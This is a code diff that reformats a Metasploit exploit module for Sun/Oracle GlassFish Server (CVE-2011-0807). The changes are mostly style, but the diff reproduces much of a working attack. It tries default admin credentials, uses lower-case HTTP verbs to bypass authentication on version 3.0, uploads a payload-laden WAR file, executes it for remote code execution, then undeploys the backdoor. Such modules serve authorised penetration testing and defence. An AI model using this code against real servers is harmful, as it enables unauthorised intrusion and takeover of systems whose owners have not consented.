@@ -14,55 +14,62 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::EXE
   include Msf::Auxiliary::Report
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "Sun/Oracle GlassFish Server Authenticated Code Execution",
-      'Description'    => %q{
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "Sun/Oracle GlassFish Server Authenticated Code Execution",
+        'Description' => %q{
           This module logs in to a GlassFish Server (Open Source or Commercial) using various
-        methods (such as authentication bypass, default credentials, or user-supplied login),
-        and deploys a malicious war file in order to get remote code execution. It has been
-        tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System Application Server 9.x. Newer
-        GlassFish versions do not allow remote access (Secure Admin) by default, but is required
-        for exploitation.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+          methods (such as authentication bypass, default credentials, or user-supplied login),
+          and deploys a malicious war file in order to get remote code execution. It has been
+          tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System Application Server 9.x. Newer
+          GlassFish versions do not allow remote access (Secure Admin) by default, but is required
+          for exploitation.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'juan vazquez', # Msf module for Glassfish 3.0
           'Joshua Abraham <jabra[at]rapid7.com>', # Glassfish 3.1, 2.x & Sun Java System Application Server 9.1
           'sinn3r' # Rewrite for everything
         ],
-      'References'     =>
-        [
+        'References' => [
           ['CVE', '2011-0807'],
           ['OSVDB', '71948']
         ],
-      'Platform'       => ['win', 'linux', 'java'],
-      'Targets'        =>
-        [
-          [ 'Automatic', { } ],
-          [ 'Java Universal',    { 'Arch' => ARCH_JAVA, 'Platform' => 'java' } ],
-          [ 'Windows Universal', { 'Arch' => ARCH_X86,  'Platform' => 'win' } ],
-          [ 'Linux Universal',   { 'Arch' => ARCH_X86,  'Platform' => 'linux' } ]
+        'Platform' => ['win', 'linux', 'java'],
+        'Targets' => [
+          [ 'Automatic', {} ],
+          [ 'Java Universal', { 'Arch' => ARCH_JAVA, 'Platform' => 'java' } ],
+          [ 'Windows Universal', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ],
+          [ 'Linux Universal', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
         ],
-      'DisclosureDate' => '2011-08-04',
-      'DefaultTarget'  => 0))
+        'DisclosureDate' => '2011-08-04',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
-      register_options(
-        [
-          Opt::RPORT(4848),
-          OptString.new('APP_RPORT',[ true,  'The Application interface port', '8080']),
-          OptString.new('USERNAME', [ true, 'The username to authenticate as','admin' ]),
-          OptString.new('PASSWORD', [ true, 'The password for the specified username','' ]),
-          OptString.new('TARGETURI', [ true,  "The URI path of the GlassFish Server", '/']),
-          OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false])
-        ])
+    register_options(
+      [
+        Opt::RPORT(4848),
+        OptString.new('APP_RPORT', [ true, 'The Application interface port', '8080']),
+        OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]),
+        OptString.new('PASSWORD', [ true, 'The password for the specified username', '' ]),
+        OptString.new('TARGETURI', [ true, "The URI path of the GlassFish Server", '/']),
+        OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false])
+      ]
+    )
   end
 
   #
   # Send GET or POST request, and return the response
   #
-  def send_glassfish_request(path, method, session='', data=nil, ctype=nil)
+  def send_glassfish_request(path, method, session = '', data = nil, ctype = nil)
     headers = {}
     headers['Cookie'] = "JSESSIONID=#{session}" unless session.blank?
     headers['Content-Type'] = ctype if ctype
@@ -72,9 +79,9 @@ class MetasploitModule < Msf::Exploit::Remote
     headers['Accept-Encoding'] = 'gzip, deflate, br'
 
     res = send_request_raw({
-      'uri'     => path,
-      'method'  => method,
-      'data'    => data,
+      'uri' => path,
+      'method' => method,
+      'data' => data,
       'headers' => headers,
     })
 
@@ -155,7 +162,7 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   # Return server information
   #
-  def query_serverinfo(session,version)
+  def query_serverinfo(session, version)
     res = ''
 
     if version == '2.x' || version == '9.x'
@@ -182,7 +189,7 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   # Return viewstate and entry before deleting a GlassFish application
   #
-  def get_delete_info(session, version, app='')
+  def get_delete_info(session, version, app = '')
     if version == '2.x' || version == '9.x'
       path = '/applications/webApplications.jsf'
       res = send_glassfish_request(path, @verbs['GET'], session)
@@ -244,27 +251,27 @@ class MetasploitModule < Msf::Exploit::Remote
   # Send an "undeploy" request to Glassfish and remove our backdoor
   #
   def undeploy(viewstate, session, entry)
-    #Send undeployment request
-    data  = [
-    "propertyForm%3AdeployTable%3AtopActionsGroup1%3Afilter_list=",
-    "&propertyForm%3AdeployTable%3AtopActionsGroup1%3Afilter_submitter=false",
-    "&#{Rex::Text.uri_encode(entry)}=true",
-    "&propertyForm%3AhelpKey=ref-applications.html",
-    "&propertyForm_hidden=propertyForm_hidden",
-    "&javax.faces.ViewState=#{Rex::Text.uri_encode(viewstate)}",
-    "&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1",
-    "&javax.faces.source=propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1",
-    "&javax.faces.partial.execute=%40all",
-    "&javax.faces.partial.render=%40all",
-    "&bare=true",
-    "&propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1=propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1",
-    "&javax.faces.partial.ajax=true"
+    # Send undeployment request
+    data = [
+      "propertyForm%3AdeployTable%3AtopActionsGroup1%3Afilter_list=",
+      "&propertyForm%3AdeployTable%3AtopActionsGroup1%3Afilter_submitter=false",
+      "&#{Rex::Text.uri_encode(entry)}=true",
+      "&propertyForm%3AhelpKey=ref-applications.html",
+      "&propertyForm_hidden=propertyForm_hidden",
+      "&javax.faces.ViewState=#{Rex::Text.uri_encode(viewstate)}",
+      "&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1",
+      "&javax.faces.source=propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1",
+      "&javax.faces.partial.execute=%40all",
+      "&javax.faces.partial.render=%40all",
+      "&bare=true",
+      "&propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1=propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1",
+      "&javax.faces.partial.ajax=true"
     ].join()
 
-    path  = '/common/applications/applications.jsf'
+    path = '/common/applications/applications.jsf'
     ctype = 'application/x-www-form-urlencoded'
 
-    res   = send_glassfish_request(path, @verbs['POST'], session, data, ctype)
+    res = send_glassfish_request(path, @verbs['POST'], session, data, ctype)
     if !res
       print_error("Undeployment failed on #{path} - No Response")
     else
@@ -322,7 +329,7 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   # Return the formatted version of the POST data
   #
-  def format_2_x_war(boundary,name,value=nil, war=nil)
+  def format_2_x_war(boundary, name, value = nil, war = nil)
     data = ''
 
     data << boundary
@@ -337,7 +344,7 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   # Return the formatted version of the POST data
   #
-  def format(boundary,name,value=nil, war=nil)
+  def format(boundary, name, value = nil, war = nil)
     data = ''
 
     if war
@@ -428,7 +435,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       boundary = "-----------------------------#{boundary}"
 
-      #Setup dynamic arguments
+      # Setup dynamic arguments
       num1 = start.to_i
       num2 = num1 + 14
       num3 = num2 + 2
@@ -448,73 +455,73 @@ class MetasploitModule < Msf::Exploit::Remote
       id8 = num4 + 8
       id9 = num4 + 9
 
-      uploadParam_name  = "form:sheet1:section1:prop1:fileupload_com.sun.webui.jsf.uploadParam"
+      uploadParam_name = "form:sheet1:section1:prop1:fileupload_com.sun.webui.jsf.uploadParam"
       uploadParam_value = "form:sheet1:section1:prop1:fileupload"
 
       focusElementId_name = "com_sun_webui_util_FocusManager_focusElementId"
       focusElementId_data = "form:title2:bottomButtons:uploadButton"
 
       data = [
-        format(boundary,"uploadRdBtn","client"),
+        format(boundary, "uploadRdBtn", "client"),
         ## web service
         format(boundary, app_base, nil, war),
         ## sheet1
         format(boundary, uploadParam_name, uploadParam_value),
-        format(boundary,"form:sheet1:section1:prop1:extension",".war"),
-        format(boundary,"form:sheet1:section1:prop1:action","client"),
-        format(boundary,"form:sheet1:sun_propertySheetSection#{num1.to_s}:type:appType","war"),
-        format(boundary,"form:appClient:psection:nameProp:appName","#{app_base}"),
-        format(boundary,"form:appClient:psection:descriptionProp:description"),
+        format(boundary, "form:sheet1:section1:prop1:extension", ".war"),
+        format(boundary, "form:sheet1:section1:prop1:action", "client"),
+        format(boundary, "form:sheet1:sun_propertySheetSection#{num1.to_s}:type:appType", "war"),
+        format(boundary, "form:appClient:psection:nameProp:appName", "#{app_base}"),
+        format(boundary, "form:appClient:psection:descriptionProp:description"),
         ## war
-        format(boundary,"form:war:psection:cxp:ctx","#{app_base}"),
-        format(boundary,"form:war:psection:nameProp:appName","#{app_base}"),
-        format(boundary,"form:war:psection:vsProp:vs"),
-        format(boundary,"form:war:psection:enableProp:sun_checkbox" + id1.to_s,"true"),
-        format(boundary,"form:war:psection:enableProp:sun_checkbox" + id2.to_s,"true"),
-        format(boundary,"form:war:psection:enableProp:sun_checkbox" + id3.to_s,"true"),
-        format(boundary,"form:war:psection:enableProp:sun_checkbox" + id4.to_s,"true"),
-        format(boundary,"form:war:psection:enableProp:sun_checkbox" + id5.to_s,"true"),
-        format(boundary,"form:war:psection:enableProp:sun_checkbox" + id6.to_s,"true"),
-        format(boundary,"form:war:psection:enableProp:sun_checkbox" + id7.to_s,"true"),
-        format(boundary,"form:war:psection:enableProp:sun_checkbox" + id8.to_s,"true"),
-        format(boundary,"form:war:psection:enableProp:sun_checkbox" + id9.to_s,"true"),
-        format(boundary,"form:other:psection:descriptionProp:description", ""),
-        format(boundary,"form:other:psection:librariesProp:library", ""),
-        format(boundary,"form:other:psection:deploymentOrder:deploymentOrder", ""),
-        format(boundary,"form:other:psection:implicitCdi:implicitCdi", "true"),
-        format(boundary,"form:other:psection:enableProp:sun_checkbox44","true"),
-        format(boundary,"form:war:psection:enableProp:sun_checkbox42","true"),
-        format(boundary,"form:other:psection:vsProp:vs",""),
-        format(boundary,"form:rar:psection:implicitCdi:implicitCdi","true"),
-        format(boundary,"form:rar:psection:deploymentOrder:deploymentOrder",""),
-        format(boundary,"form:rar:psection:enableProp:sun_checkbox40","true"),
-        format(boundary,"form:other:psection:nameProp:appName", app_base),
-        format(boundary,"form:rar:psection:nameProp:appName", app_base),
-        format(boundary,"form:jar:psection:nameProp:appName", app_base),
-        format(boundary,"form:ear:psection:nameProp:appName", app_base),
-        format(boundary,"form:ear:psection:descriptionProp:description",""),
-        format(boundary,"form:jar:psection:deploymentOrder:deploymentOrder", ""),
-        format(boundary,"form:jar:psection:implicitCdi:implicitCdi","true"),
-        format(boundary,"form:ear:psection:jw:jwc","true"),
-        format(boundary,"form:ear:psection:vsProp:vs",""),
-        format(boundary,"form:appClient:psection:deploymentOrder:deploymentOrder",""),
-        format(boundary,"form:jar:psection:enableProp:sun_checkbox38","true"),
-        format(boundary,"form:jar:psection:descriptionProp:description", ""),
-        format(boundary,"form:ear:psection:implicitCdi:implicitCdi","true"),
-        format(boundary,"form:appClient:psection:implicitCdi:implicitCdi","true"),
-        format(boundary,"form:ear:psection:enableProp:sun_checkbox36","true"),
-        format(boundary,"form:war:psection:deploymentOrder:deploymentOrder",""),
-        format(boundary,"form:jar:psection:librariesProp:library",""),
-        format(boundary,"form:appClient:psection:jw:jwt","true"),
-        format(boundary,"form:ear:psection:librariesProp:library", ""),
-        format(boundary,"form:sheet1:sun_propertySheetSection23:type:appType","war"),
-        format(boundary,"form:ear:psection:deploymentOrder:deploymentOrder",""),
-        format(boundary,"form:rar:psection:descriptionProp:description",""),
-        format(boundary,"form:war:psection:implicitCdi:implicitCdi","true"),
-        format(boundary,"form:war:psection:librariesProp:library"),
-        format(boundary,"form:war:psection:descriptionProp:description"),
-        format(boundary,"form_hidden","form_hidden"),
-        format(boundary,"javax.faces.ViewState","#{viewstate}"),
+        format(boundary, "form:war:psection:cxp:ctx", "#{app_base}"),
+        format(boundary, "form:war:psection:nameProp:appName", "#{app_base}"),
+        format(boundary, "form:war:psection:vsProp:vs"),
+        format(boundary, "form:war:psection:enableProp:sun_checkbox" + id1.to_s, "true"),
+        format(boundary, "form:war:psection:enableProp:sun_checkbox" + id2.to_s, "true"),
+        format(boundary, "form:war:psection:enableProp:sun_checkbox" + id3.to_s, "true"),
+        format(boundary, "form:war:psection:enableProp:sun_checkbox" + id4.to_s, "true"),
+        format(boundary, "form:war:psection:enableProp:sun_checkbox" + id5.to_s, "true"),
+        format(boundary, "form:war:psection:enableProp:sun_checkbox" + id6.to_s, "true"),
+        format(boundary, "form:war:psection:enableProp:sun_checkbox" + id7.to_s, "true"),
+        format(boundary, "form:war:psection:enableProp:sun_checkbox" + id8.to_s, "true"),
+        format(boundary, "form:war:psection:enableProp:sun_checkbox" + id9.to_s, "true"),
+        format(boundary, "form:other:psection:descriptionProp:description", ""),
+        format(boundary, "form:other:psection:librariesProp:library", ""),
+        format(boundary, "form:other:psection:deploymentOrder:deploymentOrder", ""),
+        format(boundary, "form:other:psection:implicitCdi:implicitCdi", "true"),
+        format(boundary, "form:other:psection:enableProp:sun_checkbox44", "true"),
+        format(boundary, "form:war:psection:enableProp:sun_checkbox42", "true"),
+        format(boundary, "form:other:psection:vsProp:vs", ""),
+        format(boundary, "form:rar:psection:implicitCdi:implicitCdi", "true"),
+        format(boundary, "form:rar:psection:deploymentOrder:deploymentOrder", ""),
+        format(boundary, "form:rar:psection:enableProp:sun_checkbox40", "true"),
+        format(boundary, "form:other:psection:nameProp:appName", app_base),
+        format(boundary, "form:rar:psection:nameProp:appName", app_base),
+        format(boundary, "form:jar:psection:nameProp:appName", app_base),
+        format(boundary, "form:ear:psection:nameProp:appName", app_base),
+        format(boundary, "form:ear:psection:descriptionProp:description", ""),
+        format(boundary, "form:jar:psection:deploymentOrder:deploymentOrder", ""),
+        format(boundary, "form:jar:psection:implicitCdi:implicitCdi", "true"),
+        format(boundary, "form:ear:psection:jw:jwc", "true"),
+        format(boundary, "form:ear:psection:vsProp:vs", ""),
+        format(boundary, "form:appClient:psection:deploymentOrder:deploymentOrder", ""),
+        format(boundary, "form:jar:psection:enableProp:sun_checkbox38", "true"),
+        format(boundary, "form:jar:psection:descriptionProp:description", ""),
+        format(boundary, "form:ear:psection:implicitCdi:implicitCdi", "true"),
+        format(boundary, "form:appClient:psection:implicitCdi:implicitCdi", "true"),
+        format(boundary, "form:ear:psection:enableProp:sun_checkbox36", "true"),
+        format(boundary, "form:war:psection:deploymentOrder:deploymentOrder", ""),
+        format(boundary, "form:jar:psection:librariesProp:library", ""),
+        format(boundary, "form:appClient:psection:jw:jwt", "true"),
+        format(boundary, "form:ear:psection:librariesProp:library", ""),
+        format(boundary, "form:sheet1:sun_propertySheetSection23:type:appType", "war"),
+        format(boundary, "form:ear:psection:deploymentOrder:deploymentOrder", ""),
+        format(boundary, "form:rar:psection:descriptionProp:description", ""),
+        format(boundary, "form:war:psection:implicitCdi:implicitCdi", "true"),
+        format(boundary, "form:war:psection:librariesProp:library"),
+        format(boundary, "form:war:psection:descriptionProp:description"),
+        format(boundary, "form_hidden", "form_hidden"),
+        format(boundary, "javax.faces.ViewState", "#{viewstate}"),
         format(boundary, focusElementId_name, focusElementId_data)
       ].join()
 
@@ -535,17 +542,17 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_viewstate(body)
-      noko = Nokogiri::HTML(body)
-      inputs = noko.search('input')
-      hidden_inputs = []
-      inputs.each {|e| hidden_inputs << e if e.attributes['type'].text == 'hidden'}
-      hidden_inputs.each do |e|
-        if e.attributes['name'].text == 'javax.faces.ViewState'
-          return e.attributes['value'].text
-        end
+    noko = Nokogiri::HTML(body)
+    inputs = noko.search('input')
+    hidden_inputs = []
+    inputs.each { |e| hidden_inputs << e if e.attributes['type'].text == 'hidden' }
+    hidden_inputs.each do |e|
+      if e.attributes['name'].text == 'javax.faces.ViewState'
+        return e.attributes['value'].text
       end
+    end
 
-      ''
+    ''
   end
 
   #
@@ -566,9 +573,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # Obtain some properties
       p2 = /input type="checkbox" id="form:title:ps:psec:enableProp:sun_checkbox\d+" name="(.*)" checked/mi
-      viewstate       = get_viewstate(res.body)
+      viewstate = get_viewstate(res.body)
       status_checkbox = res.body.scan(p2)[0][0]
-      boundary        = rand_text_alphanumeric(28)
+      boundary = rand_text_alphanumeric(28)
     else
       path = "/common/applications/uploadFrame.jsf"
       res = send_glassfish_request(path, @verbs['GET'], session)
@@ -581,10 +588,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
       rnd_text = rand_text_alphanumeric(29)
 
-      viewstate       = get_viewstate(res.body)
-      typefield       = res.body.scan(p2)[0][0]
+      viewstate = get_viewstate(res.body)
+      typefield = res.body.scan(p2)[0][0]
       status_checkbox = res.body.scan(p3)[0][0]
-      boundary        = (edition == 'Open Source') ? rnd_text[0,15] : rnd_text
+      boundary = (edition == 'Open Source') ? rnd_text[0, 15] : rnd_text
     end
 
     # Get upload data
@@ -613,7 +620,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if version == '2.x' || version == '9.x'
       path = '/applications/upload.jsf?form:title:topButtons:uploadButton=%20%20OK%20%20'
     else
-      path  = '/common/applications/uploadFrame.jsf?'
+      path = '/common/applications/uploadFrame.jsf?'
       path << 'form:title:topButtons:uploadButton=Processing...'
       path << '&bare=false'
     end
@@ -628,19 +635,18 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
-    #Execute our payload using the application interface (no need to use auth bypass technique)
+    # Execute our payload using the application interface (no need to use auth bypass technique)
     jsp_path = normalize_uri(target_uri.path, app_base, "#{jsp_name}.jsp")
     nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['APP_RPORT'],
-      {
-        'Msf'        => framework,
-        'MsfExploit' => self,
-      }
-    )
+                                           {
+                                             'Msf' => framework,
+                                             'MsfExploit' => self,
+                                           })
 
     print_status("Executing #{jsp_path}...")
     req = nclient.request_raw({
-      'uri'     => jsp_path,
-      'method'  => 'GET',
+      'uri' => jsp_path,
+      'method' => 'GET',
     })
 
     if req
@@ -721,7 +727,6 @@ class MetasploitModule < Msf::Exploit::Remote
     "http://#{rhost.to_s}:#{rport.to_s}#{normalize_uri(target_uri.path)}"
   end
 
-
   def service_details
     super.merge({ post_reference_name: self.refname })
   end
@@ -733,27 +738,30 @@ class MetasploitModule < Msf::Exploit::Remote
     when /2\.x|9\.x/
       @cred_collection.prepend_cred(
         Metasploit::Framework::Credential.new(
-        public: 'admin',
-        private: 'adminadmin',
-        private_type: :password
-      ))
+          public: 'admin',
+          private: 'adminadmin',
+          private_type: :password
+        )
+      )
     when /^3\./
       @cred_collection.prepend_cred(
         Metasploit::Framework::Credential.new(
-        public: 'admin',
-        private: '',
-        private_type: :password
-      ))
+          public: 'admin',
+          private: '',
+          private_type: :password
+        )
+      )
     end
 
     @cred_collection.prepend_cred(
       Metasploit::Framework::Credential.new(
-      public: datastore['USERNAME'],
-      private: datastore['PASSWORD'],
-      private_type: :password
-    ))
+        public: datastore['USERNAME'],
+        private: datastore['PASSWORD'],
+        private_type: :password
+      )
+    )
 
-    @scanner.send_request({'uri'=>normalize_uri(target_uri.path)})
+    @scanner.send_request({ 'uri' => normalize_uri(target_uri.path) })
     @scanner.version = version
     @cred_collection.each do |raw|
       cred = raw.to_credential
@@ -782,14 +790,14 @@ class MetasploitModule < Msf::Exploit::Remote
   def make_war(selected_target)
     p = exploit_regenerate_payload(selected_target.platform, selected_target.arch)
 
-    jsp_name = rand_text_alphanumeric(4+rand(32-4))
-    app_base = rand_text_alphanumeric(4+rand(32-4))
+    jsp_name = rand_text_alphanumeric(4 + rand(32 - 4))
+    app_base = rand_text_alphanumeric(4 + rand(32 - 4))
 
     war = p.encoded_war({
-      :app_name    => app_base,
-      :jsp_name    => jsp_name,
-      :arch        => selected_target.arch,
-      :platform    => selected_target.platform
+      :app_name => app_base,
+      :jsp_name => jsp_name,
+      :arch => selected_target.arch,
+      :platform => selected_target.platform
     }).to_s
 
     return app_base, jsp_name, war
@@ -809,7 +817,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Set HTTP verbs. Lower-case is used to bypass auth on v3.0
     @verbs = {
-      'GET'  => (version == '3.0' || version == '2.x' || version == '9.x') ? 'get' : 'GET',
+      'GET' => (version == '3.0' || version == '2.x' || version == '9.x') ? 'get' : 'GET',
       'POST' => (version == '3.0' || version == '2.x' || version == '9.x') ? 'post' : 'POST',
     }
 
